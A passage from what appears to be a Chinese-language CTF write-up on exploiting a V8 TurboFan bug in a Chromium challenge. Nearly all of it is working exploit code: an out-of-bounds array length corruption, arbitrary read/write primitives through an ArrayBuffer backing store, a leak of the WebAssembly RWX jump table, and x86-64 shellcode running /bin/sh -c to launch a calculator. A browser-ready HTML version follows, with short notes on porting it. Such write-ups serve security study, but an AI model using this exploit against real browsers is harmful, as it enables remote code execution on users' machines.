class="number">1</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; <span class="number">0x4000</span>; i++)</span><br><span class="line">&#123;   </span><br><span class="line">    <span class="comment">// 查找哨兵值</span></span><br><span class="line">    <span class="keyword">if</span>(<span class="title class_">Float64ToInt64</span>(oob_arr[i]) == <span class="number">0x233333</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="title class_">WasmJSFunctionIndex</span> = i + <span class="number">1</span>;</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// 简单确认一下是否成功找到 WasmJSFunctionAddr</span></span><br><span class="line"><span class="keyword">if</span>(<span class="title class_">WasmJSFunctionIndex</span> == -<span class="number">1</span>)</span><br><span class="line">    <span class="keyword">throw</span> <span class="string">&quot;WasmJSFunctionAddr is not found!&quot;</span>;</span><br><span class="line"><span class="keyword">else</span></span><br><span class="line">    <span class="title function_">log</span>(<span class="string">&quot;[+] find WasmJSFunctionAddr offset: &quot;</span> + <span class="title class_">WasmJSFunctionIndex</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">// 获取 WasmJSFunction 地址</span></span><br><span class="line"><span class="title class_">WasmJSFunctionAddr</span> = <span class="title class_">Float64ToInt64</span>(oob_arr[<span class="title class_">WasmJSFunctionIndex</span>]) - <span class="title class_">BigInt</span>(<span class="number">1</span>);</span><br><span class="line"><span class="title function_">log</span>(<span class="string">&quot;[+] 
find WasmJSFunction address: &quot;</span> + <span class="title function_">prettyHex</span>(<span class="title class_">WasmJSFunctionAddr</span>));</span><br><span class="line"><span class="comment">// 获取 SharedFunctionInfo 地址</span></span><br><span class="line"><span class="title class_">SharedFunctionInfoAddr</span> = <span class="title function_">read_8bytes</span>(<span class="title class_">WasmJSFunctionAddr</span> + <span class="title class_">BigInt</span>(<span class="number">0x18</span>)) - <span class="title class_">BigInt</span>(<span class="number">1</span>);</span><br><span class="line"><span class="title function_">log</span>(<span class="string">&quot;[+] find SharedFunctionInfoAddr address: &quot;</span> + <span class="title function_">prettyHex</span>(<span class="title class_">SharedFunctionInfoAddr</span>));</span><br><span class="line"><span class="comment">// 获取 WasmExportedFunctionData 地址</span></span><br><span class="line"><span class="title class_">WasmExportedFunctionDataAddr</span> = <span class="title function_">read_8bytes</span>(<span class="title class_">SharedFunctionInfoAddr</span> + <span class="title class_">BigInt</span>(<span class="number">0x8</span>)) - <span class="title class_">BigInt</span>(<span class="number">1</span>);</span><br><span class="line"><span class="title function_">log</span>(<span class="string">&quot;[+] find WasmExportedFunctionDataAddr address: &quot;</span> + <span class="title function_">prettyHex</span>(<span class="title class_">WasmExportedFunctionDataAddr</span>));</span><br><span class="line"><span class="comment">// 获取 WasmInstanceObject 地址</span></span><br><span class="line"><span class="title class_">WasmInstanceObjectAddr</span> = <span class="title function_">read_8bytes</span>(<span class="title class_">WasmExportedFunctionDataAddr</span> + <span class="title class_">BigInt</span>(<span class="number">0x10</span>)) - <span class="title class_">BigInt</span>(<span 
class="number">1</span>);</span><br><span class="line"><span class="title function_">log</span>(<span class="string">&quot;[+] find WasmInstanceObjectAddr address: &quot;</span> + <span class="title function_">prettyHex</span>(<span class="title class_">WasmInstanceObjectAddr</span>));</span><br><span class="line"><span class="comment">// 获取 JumpTableStart 地址</span></span><br><span class="line"><span class="title class_">JumpTableStartAddr</span> = <span class="title function_">read_8bytes</span>(<span class="title class_">WasmInstanceObjectAddr</span> + <span class="title class_">BigInt</span>(<span class="number">0xe8</span>));</span><br><span class="line"><span class="title function_">log</span>(<span class="string">&quot;[+] find JumpTableStartAddr address: &quot;</span> + <span class="title function_">prettyHex</span>(<span class="title class_">JumpTableStartAddr</span>));</span><br><span class="line"></span><br><span class="line"><span class="comment">/******* -- 写入并执行shell code -- *******/</span></span><br><span class="line"><span class="keyword">var</span> shellcode = <span class="keyword">new</span> <span class="title class_">Uint8Array</span>(</span><br><span class="line">    [<span class="number">0x6a</span>, <span class="number">0x3b</span>, <span class="number">0x58</span>, <span class="number">0x99</span>, <span class="number">0x48</span>, <span class="number">0xbb</span>, <span class="number">0x2f</span>, <span class="number">0x62</span>, <span class="number">0x69</span>, <span class="number">0x6e</span>, <span class="number">0x2f</span>, <span class="number">0x73</span>, <span class="number">0x68</span>, <span class="number">0x00</span>, <span class="number">0x53</span>,</span><br><span class="line">     <span class="number">0x48</span>, <span class="number">0x89</span>, <span class="number">0xe7</span>, <span class="number">0x68</span>, <span class="number">0x2d</span>, <span class="number">0x63</span>, <span class="number">0x00</span>, <span 
class="number">0x00</span>, <span class="number">0x48</span>, <span class="number">0x89</span>, <span class="number">0xe6</span>, <span class="number">0x52</span>, <span class="number">0xe8</span>, <span class="number">0x1c</span>, <span class="number">0x00</span>,</span><br><span class="line">     <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x44</span>, <span class="number">0x49</span>, <span class="number">0x53</span>, <span class="number">0x50</span>, <span class="number">0x4c</span>, <span class="number">0x41</span>, <span class="number">0x59</span>, <span class="number">0x3d</span>, <span class="number">0x3a</span>, <span class="number">0x30</span>, <span class="number">0x20</span>, <span class="number">0x67</span>, <span class="number">0x6e</span>,</span><br><span class="line">     <span class="number">0x6f</span>, <span class="number">0x6d</span>, <span class="number">0x65</span>, <span class="number">0x2d</span>, <span class="number">0x63</span>, <span class="number">0x61</span>, <span class="number">0x6c</span>, <span class="number">0x63</span>, <span class="number">0x75</span>, <span class="number">0x6c</span>, <span class="number">0x61</span>, <span class="number">0x74</span>, <span class="number">0x6f</span>, <span class="number">0x72</span>, <span class="number">0x00</span>,</span><br><span class="line">     <span class="number">0x56</span>, <span class="number">0x57</span>, <span class="number">0x48</span>, <span class="number">0x89</span>, <span class="number">0xe6</span>, <span class="number">0x0f</span>, <span class="number">0x05</span>]</span><br><span class="line">);</span><br><span class="line"><span class="comment">// 写入shellcode </span></span><br><span class="line"><span class="title function_">log</span>(<span class="string">&quot;[+] writing shellcode ... 
&quot;</span>);</span><br><span class="line"><span class="comment">// (each write stores 8 bytes, but for simplicity only 1 byte of each write is meaningful data)</span></span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; shellcode.<span class="property">length</span>; i++)</span><br><span class="line">    <span class="title function_">write_8bytes</span>(<span class="title class_">JumpTableStartAddr</span> + <span class="title class_">BigInt</span>(i), shellcode[i]);</span><br><span class="line"><span class="comment">// Execute the shellcode</span></span><br><span class="line"><span class="title function_">log</span>(<span class="string">&quot;[+] execute calculator !&quot;</span>);</span><br><span class="line"><span class="title class_">WasmJSFunction</span>();</span><br></pre></td></tr></table></figure><p>In the end, the exploit successfully launches the calculator on a release build of v8:</p><p><img src="/2021/01/v8-turboFan/debugprint14.png" alt="img"></p></li><li><p>However, the attachment actually provided for the challenge is a Chromium build that embeds the vulnerable v8. Porting the exploit from v8 to Chromium required <strong>a few small adjustments</strong>, so the final exploit is as follows:</p><blockquote><p>Two things were changed:</p><ol><li><strong>The memory layout was adjusted.</strong><br>oob_arr, array_buffer and WasmJSFunctionObj are now allocated closer together so that their relative offsets stay small. As a result, fewer elements have to be scanned when searching for the sentinel values.</li><li><strong>The two sentinel-search for loops were merged into one.</strong><br>Dynamic debugging showed that, a few dozen iterations into the second for loop, the memory that originally held oob_arr and WasmJSFunctionObj gets overwritten. <strong>Presumably</strong> the GC moves these objects to another memory region because they are accessed too often. This is bad for leaking addresses, so the two for loops are merged to reduce the number of scan iterations.</li></ol></blockquote><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span 
class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span 
class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span 
class="comment">/******* -- 64位整数 与 64位浮点数相互转换的原语 -- *******/</span></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">var</span> transformBuffer = <span class="keyword">new</span> <span class="title class_">ArrayBuffer</span>(<span class="number">8</span>);</span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">var</span> bigIntArray = <span class="keyword">new</span> <span class="title class_">BigInt64Array</span>(transformBuffer);</span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">var</span> floatArray = <span class="keyword">new</span> <span class="title class_">Float64Array</span>(transformBuffer);</span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">function</span> <span class="title function_">Int64ToFloat64</span>(<span class="params">int</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">        bigIntArray[<span class="number">0</span>] = <span class="title class_">BigInt</span>(int);</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">return</span> floatArray[<span class="number">0</span>];</span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">function</span> <span class="title function_">Float64ToInt64</span>(<span class="params">float</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">        floatArray[<span class="number">0</span>] = float;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">return</span> bigIntArray[<span class="number">0</span>];</span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span 
class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="comment">/******* -- 修改JSArray length 的操作 -- *******/</span></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">var</span> oob_arr = [];</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">function</span> <span class="title function_">opt_me</span>(<span class="params">x</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">        oob_arr = [<span class="number">1.0</span>, <span class="number">1.1</span>, <span class="number">1.2</span>, <span class="number">1.3</span>, <span class="number">1.4</span>, <span class="number">1.5</span>, <span class="number">1.6</span>];</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">let</span> t = (x == <span class="number">1</span> ? 
<span class="number">9007199254740992</span> : <span class="number">9007199254740989</span>);</span></span><br><span class="line"><span class="language-javascript">        t = t + <span class="number">1</span> + <span class="number">1</span>;</span></span><br><span class="line"><span class="language-javascript">        t -= <span class="number">9007199254740990</span>;</span></span><br><span class="line"><span class="language-javascript">        t *= <span class="number">2</span>;</span></span><br><span class="line"><span class="language-javascript">        t += <span class="number">2</span>;</span></span><br><span class="line"><span class="language-javascript">        oob_arr[t] = <span class="number">3.4766779039175022e-310</span>; <span class="comment">// raw bits 0x0000400000000000, i.e. smi(0x4000)</span></span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript">    <span class="comment">// Try to trigger TurboFan so that the JSArray length gets overwritten</span></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">for</span> (<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; <span class="number">0x10000</span>; i++)</span></span><br><span class="line"><span class="language-javascript">        <span class="title function_">opt_me</span>(<span class="number">1</span>);</span></span><br><span class="line"><span class="language-javascript">    <span class="comment">// Simple sanity check</span></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">if</span> (oob_arr[<span class="number">1023</span>] == <span class="literal">undefined</span>)</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">throw</span> <span class="string">&quot;OOB Fail!&quot;</span>;</span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">else</span></span></span><br><span 
class="line"><span class="language-javascript">        <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;[+] oob_arr.length == &quot;</span> + oob_arr.<span class="property">length</span>);</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="comment">/******* -- Lay out memory (so that oob_arr, array_buffer and WasmJSFunctionObj are adjacent) -- *******/</span></span></span><br><span class="line"><span class="language-javascript">    <span class="comment">// Note: the layout must be set up only after TurboFan has run</span></span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">var</span> array_buffer;</span></span><br><span class="line"><span class="language-javascript">    array_buffer = <span class="keyword">new</span> <span class="title class_">ArrayBuffer</span>(<span class="number">0x233</span>);</span></span><br><span class="line"><span class="language-javascript">    data_view = <span class="keyword">new</span> <span class="title class_">DataView</span>(array_buffer);</span></span><br><span class="line"><span class="language-javascript">    backing_store_offset = -<span class="number">1</span>;</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="comment">// wasm binary for the C++ code `void func() &#123;&#125;`</span></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">var</span> wasmCode = <span class="keyword">new</span> <span class="title class_">Uint8Array</span>([<span class="number">0</span>, <span class="number">97</span>, <span class="number">115</span>, <span class="number">109</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">0</span>, <span 
class="number">0</span>, <span class="number">1</span>, <span class="number">132</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">128</span>,</span></span><br><span class="line"><span class="language-javascript">        <span class="number">0</span>, <span class="number">1</span>, <span class="number">96</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">3</span>, <span class="number">130</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">4</span>, <span class="number">132</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">112</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">5</span>,</span></span><br><span class="line"><span class="language-javascript">        <span class="number">131</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">6</span>, <span class="number">129</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">7</span>, <span class="number">145</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">0</span>, <span class="number">2</span>,</span></span><br><span class="line"><span class="language-javascript">        <span class="number">6</span>, <span class="number">109</span>, <span class="number">101</span>, <span 
class="number">109</span>, <span class="number">111</span>, <span class="number">114</span>, <span class="number">121</span>, <span class="number">2</span>, <span class="number">0</span>, <span class="number">4</span>, <span class="number">102</span>, <span class="number">117</span>, <span class="number">110</span>, <span class="number">99</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">10</span>, <span class="number">136</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">128</span>,</span></span><br><span class="line"><span class="language-javascript">        <span class="number">0</span>, <span class="number">1</span>, <span class="number">130</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">128</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">11</span>]);</span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">var</span> m = <span class="keyword">new</span> <span class="title class_">WebAssembly</span>.<span class="title class_">Instance</span>(<span class="keyword">new</span> <span class="title class_">WebAssembly</span>.<span class="title class_">Module</span>(wasmCode), &#123;&#125;);</span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">var</span> <span class="title class_">WasmJSFunction</span> = m.<span class="property">exports</span>.<span class="property">func</span>;</span></span><br><span class="line"><span class="language-javascript">    <span class="comment">// 将WasmJSFunction 布置到与 oob_arr 数组相同的内存段上</span></span></span><br><span class="line"><span class="language-javascript">    <span class="comment">// 这里写入了一个哨兵值0x233333，用于查找 WasmJSFunction 地址</span></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">var</span> <span class="title 
class_">WasmJSFunctionObj</span> = &#123; <span class="attr">guard</span>: <span class="title class_">Int64ToFloat64</span>(<span class="number">0x233333</span>), <span class="attr">wasmAddr</span>: <span class="title class_">WasmJSFunction</span> &#125;;</span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">var</span> <span class="title class_">WasmJSFunctionIndex</span> = -<span class="number">1</span>;</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="comment">/******* -- 任意地址读写原语 -- *******/</span></span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="comment">// 确定backing_store_offset 以及 WasmJSFunctionIndex</span></span></span><br><span class="line"><span class="language-javascript">    <span class="comment">// 只用一个for循环，只遍历一次</span></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">for</span> (<span class="keyword">let</span> i = <span class="number">0</span>; i &lt; <span class="number">0x4000</span>; i++) &#123;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">let</span> val = <span class="title class_">Float64ToInt64</span>(oob_arr[i]);</span></span><br><span class="line"><span class="language-javascript">        <span class="comment">// 开始查找哨兵值</span></span></span><br><span class="line"><span class="language-javascript">        <span class="comment">// 在查找array_buffer的backing_store时，注意DataView在Array_buffer高地址处</span></span></span><br><span class="line"><span class="language-javascript">        <span class="comment">// 查找哨兵值时有可能会查找到错误的位置，因此这里只取查找到的第一个地方</span></span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">if</span> (backing_store_offset == -<span 
class="number">1</span> &amp;&amp; val == <span class="number">0x0000023300000000</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">            backing_store_offset = i + <span class="number">1</span>;</span></span><br><span class="line"><span class="language-javascript">            <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;[+] find backing_store offset: &quot;</span> + backing_store_offset);</span></span><br><span class="line"><span class="language-javascript">        &#125;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">else</span> <span class="keyword">if</span> (<span class="title class_">WasmJSFunctionIndex</span> == -<span class="number">1</span> &amp;&amp; val == <span class="number">0x233333</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">            <span class="title class_">WasmJSFunctionIndex</span> = i + <span class="number">1</span>;</span></span><br><span class="line"><span class="language-javascript">            <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;[+] find WasmJSFunctionAddr offset: &quot;</span> + <span class="title class_">WasmJSFunctionIndex</span>);</span></span><br><span class="line"><span class="language-javascript">        &#125;</span></span><br><span class="line"><span class="language-javascript">        <span class="comment">// 如果都找到了就不用再找，以免碰上SIGMAP</span></span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">if</span> (backing_store_offset != -<span class="number">1</span> &amp;&amp; <span class="title class_">WasmJSFunctionIndex</span> != -<span class="number">1</span>)</span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">break</span>;</span></span><br><span 
class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript">    <span class="comment">// 简单确认一下是否成功找到 backing_store</span></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">if</span> (backing_store_offset == -<span class="number">1</span>)</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">throw</span> <span class="string">&quot;backing_store is not found!&quot;</span>;</span></span><br><span class="line"><span class="language-javascript">    <span class="comment">// 简单确认一下是否成功找到 WasmJSFunctionAddr</span></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">else</span> <span class="keyword">if</span> (<span class="title class_">WasmJSFunctionIndex</span> == -<span class="number">1</span>)</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">throw</span> <span class="string">&quot;WasmJSFunctionAddr is not found!&quot;</span>;</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">function</span> <span class="title function_">read_8bytes</span>(<span class="params">addr</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">        oob_arr[backing_store_offset] = <span class="title class_">Int64ToFloat64</span>(addr);</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">return</span> data_view.<span class="title function_">getBigInt64</span>(<span class="number">0</span>, <span class="literal">true</span>);</span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">function</span> <span class="title 
function_">write_8bytes</span>(<span class="params">addr, data</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">        oob_arr[backing_store_offset] = <span class="title class_">Int64ToFloat64</span>(addr);</span></span><br><span class="line"><span class="language-javascript">        data_view.<span class="title function_">setBigInt64</span>(<span class="number">0</span>, <span class="title class_">BigInt</span>(data), <span class="literal">true</span>);</span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="comment">/******* -- 布置 wasm 地址以及获取 RWX 内存地址 -- *******/</span></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">function</span> <span class="title function_">prettyHex</span>(<span class="params">bigint</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">return</span> <span class="string">&quot;0x&quot;</span> + <span class="title class_">BigInt</span>.<span class="title function_">asUintN</span>(<span class="number">64</span>, bigint).<span class="title function_">toString</span>(<span class="number">16</span>).<span class="title function_">padStart</span>(<span class="number">16</span>, <span class="string">&#x27;0&#x27;</span>);</span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="comment">// 获取 WasmJSFunction 地址</span></span></span><br><span class="line"><span class="language-javascript">    <span class="title class_">WasmJSFunctionAddr</span> = <span class="title class_">Float64ToInt64</span>(oob_arr[<span class="title 
class_">WasmJSFunctionIndex</span>]) - <span class="title class_">BigInt</span>(<span class="number">1</span>);</span></span><br><span class="line"><span class="language-javascript">    <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;[+] find WasmJSFunction address: &quot;</span> + <span class="title function_">prettyHex</span>(<span class="title class_">WasmJSFunctionAddr</span>));</span></span><br><span class="line"><span class="language-javascript">    <span class="comment">// 获取 SharedFunctionInfo 地址</span></span></span><br><span class="line"><span class="language-javascript">    <span class="title class_">SharedFunctionInfoAddr</span> = <span class="title function_">read_8bytes</span>(<span class="title class_">WasmJSFunctionAddr</span> + <span class="title class_">BigInt</span>(<span class="number">0x18</span>)) - <span class="title class_">BigInt</span>(<span class="number">1</span>);</span></span><br><span class="line"><span class="language-javascript">    <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;[+] find SharedFunctionInfoAddr address: &quot;</span> + <span class="title function_">prettyHex</span>(<span class="title class_">SharedFunctionInfoAddr</span>));</span></span><br><span class="line"><span class="language-javascript">    <span class="comment">// 获取 WasmExportedFunctionData 地址</span></span></span><br><span class="line"><span class="language-javascript">    <span class="title class_">WasmExportedFunctionDataAddr</span> = <span class="title function_">read_8bytes</span>(<span class="title class_">SharedFunctionInfoAddr</span> + <span class="title class_">BigInt</span>(<span class="number">0x8</span>)) - <span class="title class_">BigInt</span>(<span class="number">1</span>);</span></span><br><span class="line"><span class="language-javascript">    <span class="variable language_">console</span>.<span 
class="title function_">log</span>(<span class="string">&quot;[+] find WasmExportedFunctionDataAddr address: &quot;</span> + <span class="title function_">prettyHex</span>(<span class="title class_">WasmExportedFunctionDataAddr</span>));</span></span><br><span class="line"><span class="language-javascript">    <span class="comment">// 获取 WasmInstanceObject 地址</span></span></span><br><span class="line"><span class="language-javascript">    <span class="title class_">WasmInstanceObjectAddr</span> = <span class="title function_">read_8bytes</span>(<span class="title class_">WasmExportedFunctionDataAddr</span> + <span class="title class_">BigInt</span>(<span class="number">0x10</span>)) - <span class="title class_">BigInt</span>(<span class="number">1</span>);</span></span><br><span class="line"><span class="language-javascript">    <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;[+] find WasmInstanceObjectAddr address: &quot;</span> + <span class="title function_">prettyHex</span>(<span class="title class_">WasmInstanceObjectAddr</span>));</span></span><br><span class="line"><span class="language-javascript">    <span class="comment">// 获取 JumpTableStart 地址</span></span></span><br><span class="line"><span class="language-javascript">    <span class="title class_">JumpTableStartAddr</span> = <span class="title function_">read_8bytes</span>(<span class="title class_">WasmInstanceObjectAddr</span> + <span class="title class_">BigInt</span>(<span class="number">0xe8</span>));</span></span><br><span class="line"><span class="language-javascript">    <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;[+] find JumpTableStartAddr address: &quot;</span> + <span class="title function_">prettyHex</span>(<span class="title class_">JumpTableStartAddr</span>));</span></span><br><span class="line"><span 
class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="comment">/******* -- 写入并执行shell code -- *******/</span></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">var</span> shellcode = <span class="keyword">new</span> <span class="title class_">Uint8Array</span>(</span></span><br><span class="line"><span class="language-javascript">        [<span class="number">0x6a</span>, <span class="number">0x3b</span>, <span class="number">0x58</span>, <span class="number">0x99</span>, <span class="number">0x48</span>, <span class="number">0xbb</span>, <span class="number">0x2f</span>, <span class="number">0x62</span>, <span class="number">0x69</span>, <span class="number">0x6e</span>, <span class="number">0x2f</span>, <span class="number">0x73</span>, <span class="number">0x68</span>, <span class="number">0x00</span>, <span class="number">0x53</span>,</span></span><br><span class="line"><span class="language-javascript">            <span class="number">0x48</span>, <span class="number">0x89</span>, <span class="number">0xe7</span>, <span class="number">0x68</span>, <span class="number">0x2d</span>, <span class="number">0x63</span>, <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x48</span>, <span class="number">0x89</span>, <span class="number">0xe6</span>, <span class="number">0x52</span>, <span class="number">0xe8</span>, <span class="number">0x1c</span>, <span class="number">0x00</span>,</span></span><br><span class="line"><span class="language-javascript">            <span class="number">0x00</span>, <span class="number">0x00</span>, <span class="number">0x44</span>, <span class="number">0x49</span>, <span class="number">0x53</span>, <span class="number">0x50</span>, <span class="number">0x4c</span>, <span class="number">0x41</span>, <span class="number">0x59</span>, <span class="number">0x3d</span>, <span 
class="number">0x3a</span>, <span class="number">0x30</span>, <span class="number">0x20</span>, <span class="number">0x67</span>, <span class="number">0x6e</span>,</span></span><br><span class="line"><span class="language-javascript">            <span class="number">0x6f</span>, <span class="number">0x6d</span>, <span class="number">0x65</span>, <span class="number">0x2d</span>, <span class="number">0x63</span>, <span class="number">0x61</span>, <span class="number">0x6c</span>, <span class="number">0x63</span>, <span class="number">0x75</span>, <span class="number">0x6c</span>, <span class="number">0x61</span>, <span class="number">0x74</span>, <span class="number">0x6f</span>, <span class="number">0x72</span>, <span class="number">0x00</span>,</span></span><br><span class="line"><span class="language-javascript">            <span class="number">0x56</span>, <span class="number">0x57</span>, <span class="number">0x48</span>, <span class="number">0x89</span>, <span class="number">0xe6</span>, <span class="number">0x0f</span>, <span class="number">0x05</span>]</span></span><br><span class="line"><span class="language-javascript">    );</span></span><br><span class="line"><span class="language-javascript">    <span class="comment">// 写入shellcode </span></span></span><br><span class="line"><span class="language-javascript">    <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;[+] writing shellcode ... 
